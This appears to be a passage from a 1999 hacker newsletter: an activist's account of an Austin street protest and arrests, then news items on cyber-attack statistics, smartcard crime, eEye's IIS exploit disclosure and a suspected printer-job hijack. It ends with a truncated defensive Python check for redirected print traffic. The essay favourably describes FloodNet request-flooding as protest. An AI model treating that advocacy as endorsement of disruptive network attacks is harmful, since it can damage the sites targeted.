space on the eastside of Austin. Too complicated to go into here. Conversations about Pueblos Unidos,
the Grassroots News Network, and Point A threaded through the evening.
The riders included people I've known from Earth First!, from the local bicycle activist scene, and a whole
new set of folks from Point A who I don’t really know. I just thought that Ruta Maya was a gathering point
after the ride was finished. But it turned out to be something else.
THE STREET
Not long after, some people started talking about how to encourage others to start
standing out in the street in front of Ruta Maya. People had just finished the ride and were all charged up
with energy. A moment later, two young riders were moving a construction barricade and a few orange
cones into the lane of traffic coming from the west. While at the other end of the block a group took similar
barricades and placed them to stop traffic coming from the east.
And then, one at a time, people started leaving the sidewalk or leaving the edges of the street to stand
out in the middle. For a little while there were just about 10 people. A few standing near the barricade. A
few more down at the other end of the street. And more starting to filter out right in front of Ruta Maya. I
actually hadn't anticipated this. I wanted to sit down so I asked someone to pass me down a chair from
the elevated sidewalk.
I sat on the chair in the middle of one lane. Someone else picked up another chair and sat down near me.
With barricades on both ends of the block, people sitting in chairs, cars lurching forward slowly and trying
to get out, others in Ruta Maya started to take notice, and those less inclined to be the first ones to
venture out into the street, followed. A Ruta Maya worker came out and said that he needed his chair back. I
didn't argue. Ruta Maya is a cool place. And by sitting there momentarily it had served to encourage a few
more to join.
Soon there were people in both lanes of traffic out in front of Ruta Maya. At its peak maybe there were as
many as 50. Not a huge crowd. Enough to reclaim the street - temporarily. But not enough to remain once
the police started to arrive. And of course they did.
But before the police showed up, a few of the people whose idea it was to reclaim this particular section
of street spoke loudly and explained what Reclaim The Streets was all about. Small flyers titled "Whose
City Is This Anyway?" were passed out. And people started doing a "cheer" of sorts. Lacking were drums
or other instruments that are always good for stirring up a crowd.
THE POLICE
I first noticed a brown shirted Sheriff's deputy get out of a sports utility vehicle. But he simply walked by,
seemingly oblivious to what was happening. Soon thereafter the bike cops showed up. Like a number of
urban police forces in the U.S., Austin has its police-on-bicycle contingent, mostly used for patrolling the
busy downtown area.
The bike cops started to move around the crowd and address people whom they thought might be
leaders. I was actually standing with my back turned, talking to a friend, when one bike cop came up to
us. Maybe because I was smoking a cigar he thought I was a 'revolutionary leader'. (Just kidding.)
Anyway, the bike cop said to us, "I'm contacting my supervisor and if you aren't out of the street in ten
minutes, we are going to start making arrests."
I told the bike cop that I wasn't in charge. But anyway, my friend and I passed on this warning to a few
others. So when the three police vans and the handful of marked and unmarked cars showed up - to
inadvertently block the streets themselves - we were not surprised.
The three vans barreled down the road from the east and the marked and unmarked cars from the west,
stopping right at the intersection of 4th and Lavaca. Obviously, given that there were not many of us and
given that we had neither anticipated nor were we prepared to take a stand, we mostly filtered back off
the street and onto the side.
But there were a few who - for whatever reason - were not so content to give up the street that quickly.
Bike cops and regular police officers stood in the street in between the three vans and the rest of us on
the side of the road. People were jeering at the cops. I didn't see exactly what happened - or what
precipitated it - but in a flash a group of cops lunged forward and pulled someone from out of the crowd
on the side, not even someone who was standing closer to the police, but someone behind another. And
then another was arrested. And then a third.
People were yelling and screaming at the cops: "You fucking pigs!"; "Don't you have any real criminals
to arrest"; "Whose street? Our street!" They remained for awhile longer. Tensions quieted down. And the
vans and the marked and unmarked cars drove off.
All through this, my girlfriend had been trying to call a few local media outlets. She was at the payphone in
front of Ruta Maya. At one point she told me she had got through to KXAN. But no media ever showed up.
With the police gone, three of us on the way to jail, a number of the riders - who had only wanted to ride
their bikes and not get involved with this mess - on their way out, the ones who had planned this Austin
Reclaim The Street action bewilderedly consulted about how next to proceed. My girlfriend and I had both
been arrested before and were quite familiar with the process. She knew the inside of Austin's jail and
something about the procedure for getting out. She offered her advice to the younger activists and was
ready to leave them to it. But I suggested maybe we ought to also go down to the police station to help
sort things out. So we did.
THE POLICE STATION
By the time we parked the car and got inside the police station, there was already a crowd of perhaps 20
people, mostly sitting on the floor, inside the area where you ask about new arrestees. It looked like we
were now reclaiming the police station, rather than the street!
We weren't sure if the two young women and one young man were taken to this station. And there was
speculation that they could have taken them to any number of substations throughout the city, as they are
sometimes apt to do.
None of the people whose idea it was to reclaim the section of the street in front of Ruta Maya were
prepared for arrests, and in Austin there aren't really known activist lawyers - like in some U.S. cities -
readily available to help in moments like this. Although a few of the people who ended up being in the
Austin RTS action were seasoned activists, most seemed to be people who had never actually had to
deal with police arrests before. Or if they had, they certainly hadn't made any arrangements in advance.
So everything was handled on the spot.
My girlfriend has a friend who is a lawyer who has helped her out in the past. While she was on the
phone to her, others were over at the main desk waiting to hear if in fact the three were at this station and
what they were being held for. Finally, at some point between 9:30 and 10:00 we learned that yes in fact
the three had been brought to this station, and what the charges were.
One was charged with a Class C misdemeanor for refusing to obey the order of a police officer. Another
was charged with a Class C misdemeanor for disorderly conduct. But the third was charged with a Class
B misdemeanor, a more severe level, for "inciting a riot."
First of all, there was no riot, by any stretch of the imagination. But more importantly, the young woman
charged with inciting a riot - as I later learned - had merely begun to yell out a cheer. She had said, "Give
me a 'P'," - and was probably going to spell "PIG" - at which point the cops lurched forward to grab her
from out of the crowd.
My girlfriend's friend who is a lawyer advised us that it would be best if a boisterous crowd did not linger
in the police station waiting area as it might only antagonize them and encourage them to hold the three
longer. So a group drifted off and went to Lovejoys - the bar where we had started the evening off earlier.
My girlfriend and I, and a couple of friends of the people being detained, remained at the police station.
We learned that the two with Class C misdemeanors would be able to be released for $200 bond,
although it wouldn't be until much later in the night, actually the wee hours of the morning, but that the
young woman charged with inciting a riot would have to wait until a judge came at 10:30 in the morning.
When we saw that it was senseless to wait at the police station any longer, the rest of us left as well,
joining others back at Lovejoys where we drank from pitchers of beer, mulled over what had just
transpired, and continued an earlier thread about some of the internal dynamic of the new warehouse
space in Austin called Pueblos Unidos.
THE NEXT MORNING
In the middle of the night the two with Class C misdemeanors were bailed out. And
at 10:30 or so on June 19, my girlfriend's lawyer friend - a bit begrudgingly - had to go down to the station
to deal with the magistrate and help the one with the inciting riot charge get released. My girlfriend went
back to the police station in the morning as well - in part to console her lawyer friend who had had to be
bothered on a Friday evening she was spending with her husband who works out of town all during the
week. She was able to help get the one with the inciting riot charge out of jail, by being able to visit her
while in custody and explain the procedure for getting a personal release - but did not agree to be the
lawyer for these cases.
Compounding factors were that two of the people arrested, including the one with the inciting a riot
charge, had just returned to the country - literally on the afternoon of June 18 - after having been in
Guatemala and Mexico.
Now, a criminal lawyer will need to be found. People will have to spend precious and limited resources on
the entire legal process. Those who must return to court will have added stress and worry. And what
started out as an evening of revelry ends up in the onerous world of the courts.
AFTERTHOUGHTS ON THE REAL
Several things are clear. While a degree of planning for this action was undertaken - in that minimally a
date, time, and place were chosen and the action was given some form and content - there definitely
were important elements in the planning process that were overlooked. The first, obviously being that it
should have been known by the people whose intent it was to reclaim the street to realize that this sort of
activity generally falls outside the boundary of the law, that the police were likely to show up, and that
arrests were possible. And that given the possibility of arrest, contingency plans should have been made:
i.e. there should have been a lawyer on standby and even some sort of legal observer.
The second oversight was that there was no attention given to drawing in media, nor were any of the
participants using any audio or video recording devices. No photographs nor any videotape of the above
arrests were made to supply concrete evidence demonstrating that in fact the Class B misdemeanor
inciting to riot charge is ludicrous. And finally it seems that the nature and purpose of the action was not
made clearly manifest to passersby or to unconnected people sitting inside or outside of Ruta Maya.
All of these things - legal preparation, media work, and public relations - are aspects of street actions that
are fairly important. And there are clearly people in Austin who have strong skills in all of these areas and
whose services could have been called upon. I'm not sure, but I think the Austin RTS action was a last
minute one, pulled off by just a few people who didn't have time to do everything needed.
I don't want to sound too critical. During the moment - albeit a short one - there was a temporary
autonomous zone. People did in fact reclaim a portion of a street. But the cost of doing this is that several
people now unwittingly must face the hassle and expense of the court system.
HYBRIDITY: THE VIRTUAL AND THE REAL
One year ago I wrote a few short pieces with the theme of
hybridity, talking about the goal of developing actions that combined on-line (virtual) and off-line (real)
elements. In part this was a reaction to criticism the Electronic Disturbance Theater received which
claimed that by acting purely in the virtual realm we were isolating ourselves from people who focused
more or all of their attention on doing things in the street or in the flesh. We tried to introduce this idea of
Electronic Civil Disobedience to the community of activists who every year, for the past few anyway, have
gone to the School of the Americas to participate in the more traditional civil disobedience style of action.
And at a national conference on civil disobedience held in Washington, DC, this past January, two from
the EDT were part of a panel discussion on Electronic Civil Disobedience. Even so, this notion of joint
computer-based and street-based actions has a long way to go. There is still a disjuncture, a gap,
between what's happening now on the Net and what people are doing on the street. Many people
engaged in yesterday's street action in Austin, for example, probably had no idea that the virtual
component was even taking place.
EDT's participation in the global RTS actions is another step in developing both the theory and practice of
this sort of joint engagement. The Internet is inherently global and so Internet-based actions seem to be a
logical match with global street actions. But this is not to say that the particular example of FloodNet is the
most ideal way of meshing the street and Net together. The FloodNet action is something that individuals
may join from their computers at home, work, or in an educational environment. Even though acting
simultaneously, jointly, the participants in the on-line and off-line actions in this case may have been
completely different sets of people. What can be done differently?
Some examples from Amsterdam and London over the course of the last few years are instructive. During
demonstrations against a meeting of the EU in Amsterdam - which involved massive police presence in
the streets - people created web pages in which they mapped out the location of the police. The pages
were constantly updated with relevant information to demonstrators from people sending in email
messages or calling in from pay phones or cell phones. In another example, in London during an
occupation/takeover of a Shell office, activists used a portable laptop connected to a cell phone to send
out announcements to the media and others once they were inside. They were also able to directly
update a web site during the occupation.
Austin's Reclaim The Street action was about as low tech as you can go. The most sophisticated
technology was probably the bicycles used for the first part of the action. Clearly there was no digital
technology. No interface with the Net. The closest to this was probably when my girlfriend used the
payphone right in front of Ruta Maya to unsuccessfully call media as the police were making arrests. For
a moment she tapped into the telephone infrastructure - which is basically what the Internet is.
What would have happened or what could happen in the future if we are able to enhance these sorts of
street actions with a real-time audio and video presence? Imagine if on the elevated sidewalk in front of
Ruta Maya and out on the street several people had had video cameras and they were taping the entire
action. Further imagine that there were cables running from the cameras to the interior of the café where
people were sitting with laptop computers capable of handling video input and these laptops were
connected to a phone line in the café - a live stream of audio and video being netcast about the RTS
action to a global audience.
Video recording and netcasting the street action may not have prevented people from being arrested, but
it certainly would have captured a public record and people other than the participants and the observers
at Ruta Maya would have known about it. As it stands there is no recorded imagery or audio of the Austin
RTS action. Nor have there been any reports about it in the local media. Nor does anyone on the Net -
apart from those reading this - know about it.
One would think that in a town such as Austin - one credited as having one of the fastest growing
economies in the U.S. largely linked to the high tech computer industry - that activists here would have
the wherewithal to develop these sorts of uses of seemingly readily available digital technology. But there
are obstacles. Some of the obstacles are ideological, perhaps. A lingering anti-technology critique. Some
of the obstacles are economic. A genuine lack of access. Some obstacles may simply be that the ideas
are still new.
To conclude - well at least to stop, concluding may be too premature right now - in addition to an obvious
need for more attention to some basic legal, media, and publicity training, there is a need to think about
and to experiment more with ways of bringing the street and the Net closer together. We should address
this question: how do we bring what is happening on the street onto the Net?
The Zapatista FloodNet action in conjunction with the global Reclaim The Street actions is an example of
real-virtual hybridity at a world-wide level. But it is only one form and it lies within the area of Internet as
site for resistance and direct action. Finally, then, it seems there are at least two important areas where
further exploration is needed: the first, greater experimentation with other forms of on-line action and
electronic civil disobedience to be used jointly with actions on the street; the second, greater
experimentation with bringing the street and the Net closer together so that what happens on the street is
netcast in real-time onto the Net to a global audience.
END
@HWA
53.0 Cyber Attacks in Australia Double
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
The Australian Computer Emergency Response Team
(AusCERT) is claiming that cyber attacks in Australia
have doubled over the last year. They claim that there
has been a sharp rise in DoS attacks and recommend
that companies have strong security and policies in
place.
Sydney Morning Herald
http://www.smh.com.au/news/9906/16/text/business4.html
Australian Computer Emergency Response Team
http://www.auscert.org.au/
Sydney Morning Herald;
On guard against hacker attacks
Date: 16/06/99
By KIRSTY NEEDHAM
The average hacker is no longer a clever but disgruntled techno-geek. Security experts warned yesterday that dangerous programs, ready for download and use
against corporate Web sites, were being uncovered by simple keyword searches on the Internet.
Hacker attacks in Australia have doubled this year, according to the Australian Computer Emergency Response Team (AusCERT), which has seen around 1,500
incidents. AusCERT is part of an international organisation, CERT, that co-ordinates efforts against Internet security breaches.
One of the latest security problems has been a rise in "denial of service" attacks, where a Web site is crippled by a flood of requests for information.
"This can be easy to do and there are tools available to would-be hackers," said Mr Eric Halil, AusCERT operations manager. "You don't have to be an expert to
use them."
Mr Halil said many Web sites were also being "probed" by automated scanning tools. "It is difficult to determine what the motives are. Some people are joy riders -
they like to break and enter systems.
"Others like breaking into well-known systems like financial institutions. They earn kudos with their peers," he said.
A Forum of Incident Response and Security Teams (FIRST) conference in Brisbane this week is being attended by members from the military, business, government
and academia in 22 countries.
"Incidents tend to be international in nature. Even the local hacker around the corner breaking into a university will break in overseas first to cover the trail," said Mr
Byron Collie, an agent with the Australian Federal Police who is on secondment to the Australian defence forces' directorate of information warfare.
The FBI estimates that 80 per cent of attacks are made by disgruntled employees, with 20 per cent coming from outside the organisation.
However, Mr Collie said this was shifting towards 50 per cent as companies failed to take adequate security measures.
"Organisations need to have a security policy in place, including incident response procedures, if they want to conduct e-commerce or have any connectivity to the
Internet," said Mr Collie.
"Early law enforcement contact and protocols in handling evidence will ensure it is admissible in court. If it is left until the last minute or files have been bandied
around in e-mail, it jeopardises prosecutions."
Mr Mowgli Assor, a computer security specialist with Ohio State University, said there had been an increase in both hacking incidents and the tools available to
attack computer networks.
Infoguard, an incident response team set up by the FBI in March, was part of a move by the US Government to raise awareness of computer attacks, Mr Assor
said.
A reluctance by embarrassed companies to report attacks to the police or FBI had been seen as a problem, he said.
"Disgruntled teenagers are growing up and not shedding their ways. Hackers have been becoming smarter and taking more careful approaches. Break-ins are harder
to detect and protect against," Mr Assor said.
@HWA
54.0 SmartCards Next Stop for Internet Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Next stop? It's already happening, see section 20.0 ... -Ed)
June 17th 1999
From HNN http://www.hackernews.com/
contributed by chippy
The Australian Institute of Criminology has released a
report that claims that SmartCards will be the next stop
for high-tech criminals. These new crimes will force
officials to develop new forensic processes and tools to
be able to extract data from such small storage devices.
Australian Financial Review
http://www.afr.com.au/content/990616/inform/inform2.html
Australian Institute of Criminology
http://www.aic.gov.au/
Australian Financial Review;
Smartcards may be set
to revolutionise crime
By Helen Meredith
Cyber crimebusters warn that smartcards will be the next
target for digital law breakers, with the technology
lending itself to concealment of data from law
enforcement agencies.
According to a report released yesterday by the Institute
of Criminology, smartcards may have the single greatest
impact on the conduct of crime in our society with their
ability to store, process and secure significant quantities
of data.
They are expected to make the job of policing and
bringing cyber criminals to book complicated, with
experts forced to develop new forensic processes and
tools that will enable them to analyse and extract data
from digital storage devices such as smartcards.
Entitled What is Forensic Computing? the AIC report
was released to coincide with the opening of an
international conference in Brisbane on the handling of
computer security incidents.
The Federal Minister for Justice, Senator Amanda
Vanstone, speaking during the plenary session of the
FIRST Conference, said: "We are used to seeing
computer hackers portrayed in the media as youthful
idealists who are simply engaging in a bit of mischievous
fun."
This did not match up with the reality of computer crime,
she said. Damaging digital data and communications had
the potential to ruin businesses and seriously affect
national economic interests, with criminals using digital
technology both to commit crimes and hide their
activities.
Senator Vanstone said a survey of businesses carried out
by the Office of Strategic Crime Assessment in the
Attorney-General's Department, in conjunction with the
Victorian Police and consultant Deloitte Touche
Tohmatsu, had shown that about a third of firms in the
banking, technology, communications and computer
sectors had suffered unauthorised use of their systems in
the previous 12 months.
The proportion of these attacks originating externally had
increased, a trend that was expected to continue. Until
recently, most assaults on computer systems had been
identified as internal, usually involving disgruntled
employees. Authorities were also concerned that about
42 per cent of businesses had not reported such external
cyber intrusions.
"I doubt very much that two in five businesses would fail
to call in the police should the intrusion involve a physical
breach of their security, such as a break and enter, even
if nothing was taken," she said.
The use of high-grade encryption, the loss of the human
interface in financial transactions and the lack of a paper
trail were serious impediments to law enforcement.
AIC director Dr Adam Graycar said investigating
sophisticated crimes and assembling the necessary
evidence for presentation in a court of law had become a
significant issue for police.
A new specialist law enforcement field, forensic
computing, had arisen as a result. This involved
identifying digital evidence and preserving it through the
investigation process.
@HWA
55.0 Internet Was Designed without Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Why are viruses and 'evil hackers' seemingly running
rampant all over the internet? Because in the beginning
it was designed that way. Take a romp through the
early formative years of the net, all in six or seven
paragraphs.
Washington Post
http://www.washingtonpost.com/wp-srv/WPlate/1999-06/15/150l-061599-idx.html
Vipers In the Sandbox
Used to Be, the Internet Was a Safe Place to Play
By John Schwartz
Washington Post Staff Writer
Tuesday, June 15, 1999; Page C01
Why are the newspapers full of reports of hackers defacing government
Web sites and nasty viruses wreaking havoc on computers around the
world?
In no small part it is a cultural problem that goes back to the '60s origins of
personal computing and the Internet. Many of the Internet pioneers were
bearded longhairs, academics and engineers whose techno-hippie ethos
suffused their new world. They knew each other, were part of a
community. Trust was the rule. The early Internet was much more about
openness and communication than walls and locks. The faults it was
supposed to correct were in the machines, not in us: corrupted packets,
not corrupted morals.
"Once upon a time there was the time of innocence," says Clifford Stoll,
whose work tracking down European hackers became a popular book,
"The Cuckoo's Egg." "Once upon a time computers were not used except
in academia, where there really is nothing that's mission-critical. Once upon
a time computers were mainly play toys for the techno-weirds--techie play
toys."
In that environment, hacking was part of the fun of what Stoll has called the
early Internet "sandbox."
"In that environment, there seems to be a cachet of 'Hey! I wrote a virus!
Hee-ho!' In that environment, it seems funny to break into somebody else's
computer. . . . It seems somewhat innocent to read somebody else's
e-mail."
It started with hacking telephone systems. The founders of Apple
Computer--Steve Jobs and Steve Wozniak--got their start in business
peddling "blue boxes"--little devices that allowed users to hack the
telephone network and make long-distance calls for free. These "phone
phreaks" were seen by some as cultural heroes--free spirits striking a blow
against the suits, the evil corporations seen as the enemies of spontaneity
and creativity.
Once computer systems were connected by networks, "remote hacking
was an attractive challenge," Internet pioneer Vinton Cerf recalls via
e-mail. "Surreptitiously making your way into the operating system from
your secret hideout. . . . Much of the motivation was like picking locks or
scaling walls--just to see if you could do it. Harm was not the objective,
most of the time."
Katie Hafner, who has written books about the history of the Internet and
about the lives of hackers, says that this metaphor of nerds at play is
compelling--and accurate. "It was a big open playscape for these guys,"
she says. "The Net was built as a completely open community. People
would actually be offended if files were protected." To be sure, there were
some early nods to security issues--the fledgling ARPANET, the precursor
to today's Internet, required passwords. It was funded by the military, after
all. However, "the subtext was this was an open community because this
was an experiment," Hafner says.
It was built by guys like Jon Postel, the Internet pioneer who died last year.
Postel had a vision of an Internet that didn't need a center to survive, a
network that could be governed by standards and consensus without ever
putting anybody in charge. Utopian? Sure. Vulnerable? Uh-huh.
That culture rejected attempts to create computer operating systems that
incorporated security from the ground up, but were complex and
cumbersome. Computer security expert Peter Neumann says: "Viruses
exist only because of the shortsightedness of subsequent developers who
almost completely ignored the security problems" that some designers had
effectively solved.
The problem is that the Net caught on, and in the biggest possible way.
The anarchic, antiauthoritarian, don't-tell-us-how-to-run-our-lives ethic
that defined the burgeoning network--and is still held out by most of the
experts as the source of its vitality and strength--has retained that early
vulnerability. Broader penetration of the Internet into society meant
broader penetration of society into the Internet; it became more like the
real world, and the real world is a tough place.
In '60s terms, the idea of free spirits being outside the control of central
authority was the best of all possible worlds. But with no one in charge, it
was damnedly hard to plug security holes.
A big wake-up call came in 1988 when Robert T. Morris Jr., then a
student at Cornell University, released a computer program that
single-handedly crashed systems across the Internet. His father, a famous
programmer and security expert, was of the generation that had hacked for
fun. Morris Jr. didn't mean to bring down the Net. "His mischief was kind
of in the spirit of the Net," says Hafner. But by then the Internet was no
longer a playscape, and the damage was real.
Of course if the Net's problem is anarchy, the problem with personal
computers is monarchy: Bill Gates. Microsoft "is indeed the evil empire
when it comes to robust infrastructures," says Neumann.
Two viruses that recently swept through the world's computers, Melissa
and Explore.zip, took advantage of the fact that so many millions of PCs
run on a suite of Microsoft's programs. The company's latest offerings
include security options--but the options are turned off at the factory. The
security measures make computing a little clunkier, and cut users off from
some of the bells and whistles that Microsoft writes into its programs. Says
computer security expert Eugene Spafford of Purdue University, it's as if
consumers "said they wanted faster cars," and so the vendors maximize
speed by providing "faster cars, but with no brakes and no air bags!"
Release a virus that attacks that company's software specifically, and "it's
analogous to the Spaniards bringing smallpox to the Incas," he says. "There
was no immunity--they just wiped everybody out. . . . We've really set up
our environment in an unsafe way."
Of course today's Internet is a mirror of society. It may have been
conceived in a spirit of trust and information wanting to be free and good
practical jokes. But today it's about--money. The frontier is getting settled
by corporations worth billions, all of which are promising to sell us our
future.
They have to deliver, so anti-virus programmers and network security
consultants have a market opportunity.
It's a tough time for a system that was created in an age of innocence. It
will be interesting to see if a network strong enough to survive nuclear
attack can survive its own success.
© Copyright 1999 The Washington Post Company
@HWA
56.0 Original Apple I On the Auction Block
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by Cuda
What is being called the first Apple I ever sold will soon
be sold via auction. The Auctioneers are expecting bids
to go well over $40,000. One of of approximately 200
that where ever built this one includes original
documentation including the original 8-page manual. The
auction company will accept absentee bids online.
Better hurry. The live bidding starts on Tuesday June
29, at 11 a.m.
La Salle Auctions
http://www.lasallegallery.com/framemac.htm
@HWA
57.0 Microsoft Calls eEye Irresponsible
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
A week after notifying Microsoft of a major hole in its
Internet Information Server 4.0 eEye Digital Security
Team went public with the information and published an
exploit for the hole. The Microsoft spin machine labeled
this action as 'Irresponsible'. The finger here should not
be pointed at eEye who did the honorable thing by
alerting the public and posting a real fix before
Microsoft, but should instead be pointed at Microsoft for
creating bad software, and even worse, concealing the
information for up to a week. Unfortunately these
articles don't seem to understand that.
LA Times
http://www.latimes.com/HOME/BUSINESS/t000054445.html
Nando Times
http://www.techserver.com/story/body/0,1634,61071-97188-693078-0,00.html
The UK Register
http://www.theregister.co.uk/990618-000010.html
Associated Press - Via San Jose Mercury News
http://www.mercurycenter.com/breaking/docs/078774.htm
InfoWorld
http://www.infoworld.com/cgi-bin/displayStory.pl?990617.hneeye.htm
eEye Digital Security Team
http://www.eeye.com/
Microsoft
http://www.microsoft.com/security/bulletins/ms99-019.asp
Late Update
Well, at least Forbes gets it.
Forbes
http://www.forbes.com/tool/html/99/Jun/0618/mu5.htm
Forbes;
Microsoft's security secret
By Benjamin Polen
NEW YORK. 12:45PM EDT—Microsoft’s
(nasdaq: MSFT) failure to immediately alert
customers of a serious security flaw in its
Internet Information Server (IIS) could hurt the
company’s image and cost it customers as the
software giant tries to establish a position within the
competitive marketplace of mission-critical server
applications.
Microsoft knew about the vulnerability for a week but
tried to delay telling customers until it could prepare
a software patch.
But Microsoft’s efforts to suppress notification of the
IIS bug ultimately backfired and proved embarrassing
when eEye, a privately held network security
company, took the information to the public on
Tuesday.
eEye detected the bug during a beta test of a
security program and alerted Microsoft of the
problem on June 8. The vulnerability is so severe that
anyone with modest programming skills and an
Internet connection can gain complete control over a
web server running IIS, which runs on 22.3% of the
web servers on the Internet, according to research
firm Netcraft.
Despite the severity of the problem, Microsoft
stopped responding to eEye's E-mails after June 11,
according to Firas Bushnaq, CEO of eEye. After
several days, eEye decided to post an advisory on
its web site on Tuesday. The CERT Coordination
Center, a federally funded computer security
research institute at Carnegie-Mellon University,
posted an advisory on the following day, lending
credence to eEye's concerns.
Firas Bushnaq said his company acted because
Microsoft was "not taking the vulnerability seriously."
When Microsoft still had not publicly acknowledged
the vulnerability six hours after eEye posted the
advisory, the security company went a step further
and published source code that could be used
against the IIS bug. "When it was at that level, we
decided we had to release the exploit, we would
definitely get more attention," said Bushnaq.
For its part, Microsoft was not pleased with eEye’s
decision to issue an advisory, much less any source
code that could be used against their product.
Microsoft deems eEye’s full disclosure decision as
"irresponsible" and "beyond comprehension,"
according to Jason Garms, Microsoft’s lead product
manager for Windows NT security.
The disagreement between Microsoft and eEye
highlights a burgeoning culture clash in the computer
world where traditional corporate secrecy collides
with the free-information ethos of the Net.
On its web site, eEye explained why it felt justified in
posting the advisory and the source code. "Our
responsibility to our clients and the whole network
community is to disclose as many details as
possible.… This is the way we can contribute to the
security community and keep software vendors
working hard at producing more robust products."
For its part, Microsoft hoped that by keeping
knowledge of the vulnerability secret, it could protect
its customers until a patch had been developed and
tested. "Frankly, the feedback from customers is
that they don’t want us to go and publicize our bugs
before we have fixes for our problems," Garms said.
But at least one industry analyst questions
Microsoft’s handling of the situation. "If you want
your customers to depend on your products for
mission-critical applications, then you have to avoid
at all costs any kind of behavior that suggests you’re
not to be trusted and you’re not dependable," said
Eric Hemmendinger, a senior analyst at the
Aberdeen Group. "Having a problem occur is one
thing. But not acknowledging it is another issue
altogether. For that people should hold them
accountable."
Hemmendinger compared Microsoft’s attitude toward
corporate information technology managers with that
of a rude guest. "It’s like an immature person being
invited to the party and not behaving responsibly.
This is not the kind of behavior that gets you invited
back to the party," he said.
The situation could come back to haunt Microsoft as
it tries to attract new corporate customers. "If you
are considering using IIS and you become aware of
things like this in Microsoft's behavior you got to
take this into consideration," Hemmendinger said. "If
they really want to be accepted in the data center
this is not the right behavior."
-=-
UK register;
Posted 18/06/99 12:33pm by John Lettice
Major MS Web Server security hole exposed,
plugged
Security outfit eEye has roused Microsoft's ire and garnered itself some cheap
publicity by going public with information on what it says is a serious security flaw in
Microsoft's Internet Information Server (IIS) 4.0. The move hasn't helped the company's
relationship with Microsoft any, but it seems to have triggered the appearance of a
swift patch, full fix to follow.
According to eEye the flaw allows arbitrary code to be run on any web server running
IIS 4.0, and by using a buffer overflow bug in the software attackers can remotely
execute code to enable access to all data on the server. So it's a serious one,
although Microsoft says it hasn't had any reports of the security hole being used so far.
eEye accuses Microsoft of failing to give the problem the attention it deserved. The
company claims to have hassled MS for days, but "after the fifth day of reporting the
bug to Microsoft, they stopped responding to our emails." So the company went public
with the problem three days later, as an attempt to force Microsoft's hand.
Microsoft swiftly posted a patch, but accuses eEye of irresponsibility in publicising a
problem before a fix had been found. There's some justification in that, but there's also
some in the view that being able to announce "we've found a hole, but we fixed it" is
better than having to confirm "Yike, there's a huge security hole in our product." ®
@HWA
58.0 Has the FBI Overreacted?
~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Scott Peterson has some interesting commentary about
the recent crackdown of the FBI on web graffiti artists.
The government has compared recent cracks to the use
of terrorist weapons such as chemical and biological
weapons. Mr. Peterson says it is nothing of the sort and
that the recent crackdown fosters images of
McCarthyism. Definitely some interesting viewpoints
here and worth the time to read.
PC Week
http://www.zdnet.com/pcweek/stories/news/0,4153,406619,00.html
** Sorry, the ZDNet nazis have cut-and-paste prevention in their HTML code so I
couldn't reprint the article here. (And you can't either, for personal record;
wtf kind of lame action is that?) The reason I do reprint the articles is
because often times (see previous section links for examples) the stories are
unavailable or pay-only for archives. If anyone knows how to thwart ZDNet's
(or anyone else's) anti cut-and-paste tactics email me hwa@press.usmc.net! And
no, view source doesn't work either ...
@HWA
59.0 Printer at Spa War Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Silicosis
Ron Broersma, from the Space and Naval Systems
Warfare Center, has claimed that Russians were able
to redirect print jobs destined for a local printer back to
Russia. While such a hack is possible in theory the
difficulties of doing so would make it seem unlikely. DNS
cache corruption seems like the most likely scenario. It
is too bad that Mr. Broersma did not respond to the
authors of this article with confirmation.
CMP Net
http://www.techweb.com/wire/story/TWB19990617S0007
Russians Hack U.S. Printer
(06/17/99, 10:56 a.m. ET)
By Lee Bruno and Robin Gareiss, Data Communications
Welcome back, Cold War. It looks as though
the Russians might be up to their old tricks,
if the infiltration of the network at the Space
and Naval Systems Warfare Center (Spa
War) in San Diego, Calif., is any indication.
The incursion was discovered by Ron Broersma, a Spa
War network operations engineer, when a local network
print job took an unusually long time. Monitoring tools
revealed a file had been hijacked from the printing
queue, sent to a server in Russia, and finally back to the
Spa War printer. Broersma concluded the network
intruder had hacked into the printer, and reconfigured
routing tables on equipment elsewhere on the Spa War
network to ship the file to Russia.
Broersma relayed his account of the network printer
hack at a recent meeting of the North American
Network Operators' Group. He said he secured Spa
War's printers after the attack by resetting router filters,
and by eliminating older printers that, he said, are
especially vulnerable.
"It turned out to be a real tough problem for us," he
said.
Broersma has not returned subsequent phone calls for
further comment, however. It's also not known who the
Russian server belonged to, or what information was
compromised.
Networked printers are known to be especially
vulnerable to hacking attacks. They have their own IP
addresses, and they run various standard protocols that
can be exploited. To make matters worse, printer
vendors haven't added any strong security features to
their products that would protect them against
break-ins.
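Whatever the actual mechanism at Spa War (the article says routing tables, HNN suspects a corrupted DNS cache), a redirected print job leaves two traces an operator can check for: the printer's name resolving to an address that is not the one in inventory, and print-protocol flows (LPD on 515, IPP on 631, raw JetDirect on 9100) crossing the site boundary in either direction. The following is an added example of such a check, not code from HNN, Data Communications or Spa War; the printer name, site prefixes, resolver answer and flow records are all constructed for the illustration (hypothetical hostname, RFC 5737 documentation addresses).

```python
import ipaddress

# Print-spooler protocols and their well-known TCP ports.
PRINT_PORTS = {515: "lpd", 631: "ipp", 9100: "raw"}

# Constructed inventory for the example: printer hostname -> the address it
# should resolve to.  Hypothetical name, documentation address.
PRINTER_INVENTORY = {"prn-bldg4.example.mil": "192.0.2.40"}

# Constructed site prefixes: anything outside these is treated as off-site.
SITE_PREFIXES = [ipaddress.ip_network("192.0.2.0/24"),
                 ipaddress.ip_network("198.51.100.0/24")]


def on_site(addr):
    """True if addr falls inside one of the site prefixes."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in SITE_PREFIXES)


def check_printer_resolution(hostname, answers):
    """Compare what the resolver (or its cache) hands out for a printer name
    against inventory.  A wrong answer, especially an off-site one, is the
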